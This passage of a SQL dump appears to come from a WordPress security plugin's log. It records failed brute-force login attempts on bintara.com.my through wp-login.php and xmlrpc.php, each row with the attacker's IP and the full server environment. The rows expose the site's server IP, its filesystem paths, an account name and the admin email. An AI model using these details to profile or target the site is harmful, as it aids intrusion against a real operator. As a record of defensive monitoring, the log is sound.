15:01:24',17740096,19230840,'https://bintara.com.my/wp-login.php',1,0,'89.189.203.17'),(24603,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.189.203.17\";s:11:\"REMOTE_PORT\";s:5:\"52072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD1R0ViJhUiKk@yAoentAAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732487.3441\";s:12:\"REQUEST_TIME\";s:10:\"1568732487\";}}','notice','2019-09-17 15:01:28','2019-09-17 15:01:27',18256496,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'89.189.203.17'),(24604,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"34020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD2w0ViJhUiKk@yAoeowgAAAYU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568732867.759\";s:12:\"REQUEST_TIME\";s:10:\"1568732867\";}}','notice','2019-09-17 15:07:49','2019-09-17 15:07:48',17739344,19230024,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(24605,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"34276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD2xkViJhUiKk@yAoeoxAAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568732870.5862\";s:12:\"REQUEST_TIME\";s:10:\"1568732870\";}}','notice','2019-09-17 15:07:51','2019-09-17 15:07:50',18256696,19556080,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(24606,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.119.212.222\";s:11:\"REMOTE_PORT\";s:5:\"52172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD4zX-mRYMgL5SYt2EIrAAAAUo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568733389.567\";s:12:\"REQUEST_TIME\";s:10:\"1568733389\";}}','notice','2019-09-17 15:16:30','2019-09-17 15:16:29',17739680,19230856,'https://bintara.com.my/wp-login.php',1,0,'45.119.212.222'),(24607,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.119.212.222\";s:11:\"REMOTE_PORT\";s:5:\"52776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD40EViJhUiKk@yAoeqAQAAAYc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568733392.377\";s:12:\"REQUEST_TIME\";s:10:\"1568733392\";}}','notice','2019-09-17 15:16:33','2019-09-17 15:16:32',18255672,19554536,'https://bintara.com.my/xmlrpc.php',1,0,'45.119.212.222'),(24608,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"40452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD6JkViJhUiKk@yAoeqqwAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568733734.6982\";s:12:\"REQUEST_TIME\";s:10:\"1568733734\";}}','notice','2019-09-17 15:22:16','2019-09-17 15:22:15',17740776,19232136,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(24609,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"41000\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD6KUViJhUiKk@yAoeqrQAAAZY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568733737.6787\";s:12:\"REQUEST_TIME\";s:10:\"1568733737\";}}','notice','2019-09-17 15:22:19','2019-09-17 15:22:18',18257008,19557000,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(24610,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.247.210\";s:11:\"REMOTE_PORT\";s:5:\"52372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD6xUViJhUiKk@yAoerTwAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568733894.0078\";s:12:\"REQUEST_TIME\";s:10:\"1568733894\";}}','notice','2019-09-17 15:24:55','2019-09-17 15:24:54',17739800,19231032,'https://bintara.com.my/wp-login.php',1,0,'132.148.247.210'),(24611,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.247.210\";s:11:\"REMOTE_PORT\";s:5:\"53028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD6yfgg4cIpXyxKa540fgAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568733897.2065\";s:12:\"REQUEST_TIME\";s:10:\"1568733897\";}}','notice','2019-09-17 15:24:59','2019-09-17 